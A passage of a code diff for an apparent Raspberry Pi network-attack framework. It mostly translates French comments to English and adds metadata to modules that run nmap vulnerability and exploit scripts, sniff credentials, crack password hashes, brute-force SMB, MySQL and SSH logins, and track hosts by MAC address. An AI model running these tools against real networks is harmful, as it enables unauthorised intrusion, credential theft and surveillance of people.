"--max-retries 1 --host-timeout 60s --script-timeout 20s "
|
||||
@@ -329,14 +333,14 @@ class NmapVulnScanner:
|
||||
|
||||
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
|
||||
vulnerabilities: List[Dict] = []
|
||||
nm = nmap.PortScanner() # Instance locale
|
||||
nm = nmap.PortScanner() # Local instance
|
||||
|
||||
vuln_scripts = [
|
||||
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
|
||||
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
|
||||
]
|
||||
script_arg = ','.join(vuln_scripts)
|
||||
# --min-rate/--max-rate pour ne pas saturer le Pi
|
||||
# --min-rate/--max-rate to avoid saturating the Pi
|
||||
args = (
|
||||
f"-sV --script={script_arg} -T3 "
|
||||
"--script-timeout 30s --min-rate 50 --max-rate 100"
|
||||
@@ -371,7 +375,7 @@ class NmapVulnScanner:
|
||||
'details': str(output)[:200]
|
||||
})
|
||||
|
||||
# CPE Scan optionnel (sur ce batch)
|
||||
# Optional CPE scan (on this batch)
|
||||
if bool(self.shared_data.config.get('scan_cpe', False)):
|
||||
ports_for_cpe = list(discovered_ports_in_batch)
|
||||
if ports_for_cpe:
|
||||
@@ -381,10 +385,10 @@ class NmapVulnScanner:
|
||||
|
||||
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
cpe_vulns = []
|
||||
nm = nmap.PortScanner() # Instance locale
|
||||
nm = nmap.PortScanner() # Local instance
|
||||
try:
|
||||
port_list = ','.join([str(p) for p in ports])
|
||||
# --version-light à la place de --version-all (bien plus rapide)
|
||||
# --version-light instead of --version-all (much faster)
|
||||
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
|
||||
nm.scan(hosts=ip, ports=port_list, arguments=args)
|
||||
|
||||
@@ -430,7 +434,7 @@ class NmapVulnScanner:
|
||||
if vid_upper.startswith('CVE-'):
|
||||
findings_by_port[port]['cves'].add(vid)
|
||||
elif vid_upper.startswith('CPE:'):
|
||||
# On stocke sans le préfixe "CPE:"
|
||||
# Store without the "CPE:" prefix
|
||||
findings_by_port[port]['cpes'].add(vid[4:])
|
||||
|
||||
# 1) CVEs
|
||||
|
||||
@@ -179,6 +179,10 @@ class OdinEye:
|
||||
|
||||
def execute(self, ip, port, row, status_key) -> str:
|
||||
"""Standard entry point."""
|
||||
# Reset per-run state to prevent accumulation across reused instances
|
||||
self.credentials.clear()
|
||||
self.statistics.clear()
|
||||
|
||||
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
|
||||
if iface == "auto":
|
||||
iface = None # pyshark handles None as default
|
||||
@@ -186,10 +190,17 @@ class OdinEye:
|
||||
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
|
||||
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
|
||||
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
|
||||
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "packets")
|
||||
output_dir = getattr(self.shared_data, "odin_eye_output", _fallback_dir)
|
||||
|
||||
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
|
||||
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"iface": iface or "any", "filter": bpf_filter[:30]}
|
||||
|
||||
if not HAS_PYSHARK:
|
||||
logger.error("OdinEye requires pyshark but it is not installed.")
|
||||
return "failed"
|
||||
|
||||
try:
|
||||
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
|
||||
@@ -217,6 +228,8 @@ class OdinEye:
|
||||
if packet_count % 50 == 0:
|
||||
prog = int((packet_count / max_pkts) * 100)
|
||||
self.shared_data.bjorn_progress = f"{prog}%"
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"packets": str(packet_count), "creds": str(len(self.credentials))}
|
||||
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
|
||||
|
||||
except Exception as e:
|
||||
@@ -226,7 +239,7 @@ class OdinEye:
|
||||
finally:
|
||||
if self.capture:
|
||||
try: self.capture.close()
|
||||
except: pass
|
||||
except Exception: pass
|
||||
|
||||
# Save results
|
||||
if self.credentials or self.statistics['total_packets'] > 0:
|
||||
@@ -238,6 +251,8 @@ class OdinEye:
|
||||
"credentials": self.credentials
|
||||
}, f, indent=4)
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
return "success"
|
||||
|
||||
|
||||
@@ -1,11 +1,5 @@
|
||||
# actions/presence_join.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
|
||||
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
"""presence_join.py - Discord webhook notification when a target host joins the network."""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
@@ -28,7 +22,20 @@ b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_join only fires on join transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
b_requires = None # Configure via DB to restrict to specific MACs if needed
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_category = "notification"
|
||||
b_name = "Presence Join"
|
||||
b_description = "Sends a Discord webhook notification when a host joins the network."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_timeout = 30
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["presence", "discord", "notification"]
|
||||
b_icon = "PresenceJoin.png"
|
||||
|
||||
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
|
||||
|
||||
@@ -60,6 +67,8 @@ class PresenceJoin:
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
name = f"{host} ({mac})" if host else mac
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
@@ -1,11 +1,5 @@
|
||||
# actions/presence_left.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
|
||||
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
"""presence_left.py - Discord webhook notification when a target host leaves the network."""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
@@ -28,8 +22,20 @@ b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_leave only fires on leave transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
b_enabled = 1
|
||||
b_requires = None # Configure via DB to restrict to specific MACs if needed
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_category = "notification"
|
||||
b_name = "Presence Leave"
|
||||
b_description = "Sends a Discord webhook notification when a host leaves the network."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "1.0.0"
|
||||
b_timeout = 30
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_tags = ["presence", "discord", "notification"]
|
||||
b_icon = "PresenceLeave.png"
|
||||
|
||||
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
|
||||
|
||||
@@ -60,6 +66,8 @@ class PresenceLeave:
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"mac": mac, "host": host or "unknown", "ip": ip_s or "?"}
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
@@ -82,7 +82,11 @@ class RuneCracker:
|
||||
return hashlib.sha512(password.encode()).hexdigest()
|
||||
elif h_type == 'ntlm':
|
||||
# NTLM is MD4(UTF-16LE(password))
|
||||
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
|
||||
try:
|
||||
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
|
||||
except ValueError:
|
||||
# MD4 not available in this Python build (e.g., FIPS mode)
|
||||
return None
|
||||
except Exception as e:
|
||||
logger.debug(f"Hashing error ({h_type}): {e}")
|
||||
return None
|
||||
@@ -107,6 +111,8 @@ class RuneCracker:
|
||||
}
|
||||
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
|
||||
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": str(len(self.cracked))}
|
||||
|
||||
progress.advance()
|
||||
|
||||
@@ -115,7 +121,8 @@ class RuneCracker:
|
||||
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
|
||||
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
|
||||
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
|
||||
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
|
||||
_fallback_dir = os.path.join(getattr(self.shared_data, "data_dir", "/home/bjorn/Bjorn/data"), "output", "hashes")
|
||||
output_dir = getattr(self.shared_data, "rune_cracker_output", _fallback_dir)
|
||||
|
||||
if not input_file or not os.path.exists(input_file):
|
||||
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
|
||||
@@ -127,6 +134,8 @@ class RuneCracker:
|
||||
logger.error(f"Input file not found: {input_file}")
|
||||
return "failed"
|
||||
|
||||
# Reset per-run state to prevent accumulation across reused instances
|
||||
self.cracked.clear()
|
||||
# Load hashes
|
||||
self.hashes.clear()
|
||||
try:
|
||||
@@ -150,6 +159,8 @@ class RuneCracker:
|
||||
|
||||
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
|
||||
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"hashes": str(len(self.hashes)), "cracked": "0"}
|
||||
|
||||
# Prepare password plan
|
||||
dict_passwords = []
|
||||
@@ -167,34 +178,38 @@ class RuneCracker:
|
||||
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
|
||||
|
||||
try:
|
||||
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
|
||||
for pwd in all_candidates:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
executor.shutdown(wait=False)
|
||||
return "interrupted"
|
||||
executor.submit(self._crack_password_worker, pwd, progress)
|
||||
except Exception as e:
|
||||
logger.error(f"Cracking engine error: {e}")
|
||||
return "failed"
|
||||
try:
|
||||
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
|
||||
for pwd in all_candidates:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
executor.shutdown(wait=False, cancel_futures=True)
|
||||
return "interrupted"
|
||||
executor.submit(self._crack_password_worker, pwd, progress)
|
||||
except Exception as e:
|
||||
logger.error(f"Cracking engine error: {e}")
|
||||
return "failed"
|
||||
|
||||
# Save results
|
||||
if self.cracked:
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
|
||||
with open(out_file, 'w', encoding="utf-8") as f:
|
||||
json.dump({
|
||||
"target_file": input_file,
|
||||
"total_hashes": len(self.hashes),
|
||||
"cracked_count": len(self.cracked),
|
||||
"results": self.cracked
|
||||
}, f, indent=4)
|
||||
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
|
||||
return "success"
|
||||
# Save results
|
||||
if self.cracked:
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
|
||||
with open(out_file, 'w', encoding="utf-8") as f:
|
||||
json.dump({
|
||||
"target_file": input_file,
|
||||
"total_hashes": len(self.hashes),
|
||||
"cracked_count": len(self.cracked),
|
||||
"results": self.cracked
|
||||
}, f, indent=4)
|
||||
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
|
||||
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
|
||||
return "success"
|
||||
|
||||
logger.info("Cracking finished. No matches found.")
|
||||
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
|
||||
return "success" # Still success even if 0 cracked, as it finished the task
|
||||
logger.info("Cracking finished. No matches found.")
|
||||
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
|
||||
return "success" # Still success even if 0 cracked, as it finished the task
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Minimal CLI for testing
|
||||
|
||||
@@ -1,13 +1,7 @@
|
||||
# scanning.py – Network scanner (DB-first, no stubs)
|
||||
# - Host discovery (nmap -sn -PR)
|
||||
# - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
|
||||
# - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
|
||||
# - Mark alive=0 for hosts not seen this run
|
||||
# - Update stats (stats table)
|
||||
# - Light logging (milestones) without flooding
|
||||
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
|
||||
# - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
|
||||
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
|
||||
"""scanning.py - Network scanner: host discovery, MAC/hostname resolution, and port scanning.
|
||||
|
||||
DB-first design - all results go straight to SQLite. RPi Zero optimized.
|
||||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
@@ -38,6 +32,18 @@ b_priority = 1
|
||||
b_action = "global"
|
||||
b_trigger = "on_interval:180"
|
||||
b_requires = '{"max_concurrent": 1}'
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "low"
|
||||
b_tags = ["scan", "discovery", "network", "nmap"]
|
||||
b_category = "recon"
|
||||
b_name = "Network Scanner"
|
||||
b_description = "Host discovery, MAC/hostname resolution, and port scanning via nmap."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "NetworkScanner.png"
|
||||
|
||||
# --- Module-level constants (avoid re-creating per call) ---
|
||||
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
|
||||
|
||||
@@ -1,12 +1,7 @@
|
||||
"""
|
||||
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles fournies par l’orchestrateur (ip, port)
|
||||
- IP -> (MAC, hostname) depuis DB.hosts
|
||||
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
|
||||
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
|
||||
"""
|
||||
"""smb_bruteforce.py - Threaded SMB credential bruteforcer with share enumeration."""
|
||||
|
||||
import os
|
||||
import shlex
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
@@ -29,14 +24,27 @@ b_parent = None
|
||||
b_service = '["smb"]'
|
||||
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "smb", "credentials", "shares"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SMB Bruteforce"
|
||||
b_description = "Threaded SMB credential bruteforcer with share enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SMBBruteforce.png"
|
||||
|
||||
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
|
||||
|
||||
|
||||
class SMBBruteforce:
|
||||
"""Wrapper orchestrateur -> SMBConnector."""
|
||||
"""Orchestrator wrapper for SMBConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -44,11 +52,11 @@ class SMBBruteforce:
|
||||
logger.info("SMBConnector initialized.")
|
||||
|
||||
def bruteforce_smb(self, ip, port):
|
||||
"""Lance le bruteforce SMB pour (ip, port)."""
|
||||
"""Run SMB bruteforce for (ip, port)."""
|
||||
return self.smb_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "SMBBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
success, results = self.bruteforce_smb(ip, port)
|
||||
@@ -56,12 +64,12 @@ class SMBBruteforce:
|
||||
|
||||
|
||||
class SMBConnector:
|
||||
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
|
||||
"""Handles SMB attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -74,7 +82,7 @@ class SMBConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -142,10 +150,10 @@ class SMBConnector:
|
||||
|
||||
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
|
||||
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
|
||||
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
|
||||
cmd = ['smbclient', '-L', adresse_ip, '-U', f'{user}%{password}']
|
||||
process = None
|
||||
try:
|
||||
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
|
||||
process = Popen(cmd, shell=False, stdout=PIPE, stderr=PIPE)
|
||||
try:
|
||||
stdout, stderr = process.communicate(timeout=timeout)
|
||||
except TimeoutExpired:
|
||||
@@ -164,7 +172,7 @@ class SMBConnector:
|
||||
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error(f"Error executing '{cmd}': {e}")
|
||||
logger.error(f"Error executing smbclient -L for {adresse_ip}: {e}")
|
||||
return []
|
||||
finally:
|
||||
if process:
|
||||
@@ -269,7 +277,7 @@ class SMBConnector:
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
@@ -339,7 +347,7 @@ class SMBConnector:
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# insère self.results dans creds (service='smb'), database = <share>
|
||||
# Insert results into creds (service='smb'), database = <share>
|
||||
for mac, ip, hostname, share, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
@@ -350,7 +358,7 @@ class SMBConnector:
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=share, # utilise la colonne 'database' pour distinguer les shares
|
||||
database=share, # uses the 'database' column to distinguish shares
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
@@ -364,12 +372,12 @@ class SMBConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
# plus nécessaire avec l'index unique; conservé pour compat.
|
||||
# No longer needed with unique index; kept for compat.
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Mode autonome non utilisé en prod; on laisse simple
|
||||
# Standalone mode, not used in prod
|
||||
try:
|
||||
sd = SharedData()
|
||||
smb_bruteforce = SMBBruteforce(sd)
|
||||
|
||||
@@ -1,11 +1,4 @@
|
||||
"""
|
||||
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
|
||||
- Succès -> DB.creds (service='sql', database=<db>)
|
||||
- Conserve la logique (pymysql, queue/threads)
|
||||
"""
|
||||
"""sql_bruteforce.py - Threaded MySQL credential bruteforcer with database enumeration."""
|
||||
|
||||
import os
|
||||
import pymysql
|
||||
@@ -29,11 +22,24 @@ b_parent = None
|
||||
b_service = '["sql"]'
|
||||
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "sql", "mysql", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SQL Bruteforce"
|
||||
b_description = "Threaded MySQL credential bruteforcer with database enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SQLBruteforce.png"
|
||||
|
||||
class SQLBruteforce:
|
||||
"""Wrapper orchestrateur -> SQLConnector."""
|
||||
"""Orchestrator wrapper for SQLConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -41,11 +47,11 @@ class SQLBruteforce:
|
||||
logger.info("SQLConnector initialized.")
|
||||
|
||||
def bruteforce_sql(self, ip, port):
|
||||
"""Lance le bruteforce SQL pour (ip, port)."""
|
||||
"""Run SQL bruteforce for (ip, port)."""
|
||||
return self.sql_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "SQLBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
success, results = self.bruteforce_sql(ip, port)
|
||||
@@ -53,12 +59,12 @@ class SQLBruteforce:
|
||||
|
||||
|
||||
class SQLConnector:
|
||||
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles SQL (MySQL) attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +77,7 @@ class SQLConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -115,7 +121,7 @@ class SQLConnector:
|
||||
# ---------- SQL ----------
|
||||
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
|
||||
"""
|
||||
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
|
||||
Connect without DB then SHOW DATABASES. Returns (True, [dbs]) or (False, []).
|
||||
"""
|
||||
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
|
||||
try:
|
||||
@@ -188,7 +194,7 @@ class SQLConnector:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, port = self.queue.get()
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
|
||||
if success:
|
||||
@@ -213,6 +219,8 @@ class SQLConnector:
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
self.results = []
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
|
||||
if total_tasks == 0:
|
||||
@@ -232,7 +240,7 @@ class SQLConnector:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return
|
||||
self.queue.put((adresse_ip, user, password, port))
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
threads = []
|
||||
thread_count = min(8, max(1, phase_tasks))
|
||||
@@ -261,7 +269,7 @@ class SQLConnector:
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
|
||||
# For each DB found, create/update a row in creds (service='sql', database=<dbname>)
|
||||
for ip, user, password, port, dbname in self.results:
|
||||
mac = self.mac_for_ip(ip)
|
||||
hostname = self.hostname_for_ip(ip) or ""
|
||||
@@ -288,7 +296,7 @@ class SQLConnector:
|
||||
self.results = []
|
||||
|
||||
def remove_duplicates(self):
|
||||
# inutile avec l’index unique; conservé pour compat.
|
||||
# No longer needed with unique index; kept for compat.
|
||||
pass
|
||||
|
||||
|
||||
|
||||
@@ -1,15 +1,4 @@
|
||||
"""
|
||||
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
|
||||
to find accessible accounts using various user credentials. It logs the results of
|
||||
successful connections.
|
||||
|
||||
SQL version (minimal changes):
|
||||
- Targets still provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
|
||||
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
|
||||
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
|
||||
"""
|
||||
"""ssh_bruteforce.py - Threaded SSH credential bruteforcer via paramiko."""
|
||||
|
||||
import os
|
||||
import paramiko
|
||||
@@ -24,7 +13,6 @@ from shared import SharedData
|
||||
from actions.bruteforce_common import ProgressTracker, merged_password_plan
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
# Silence Paramiko internals
|
||||
@@ -32,7 +20,6 @@ for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hos
|
||||
"paramiko.kex", "paramiko.auth_handler"):
|
||||
logging.getLogger(_name).setLevel(logging.CRITICAL)
|
||||
|
||||
# Define the necessary global variables
|
||||
b_class = "SSHBruteforce"
|
||||
b_module = "ssh_bruteforce"
|
||||
b_status = "brute_force_ssh"
|
||||
@@ -40,9 +27,22 @@ b_port = 22
|
||||
b_service = '["ssh"]'
|
||||
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
|
||||
b_parent = None
|
||||
b_priority = 70 # tu peux ajuster la priorité si besoin
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
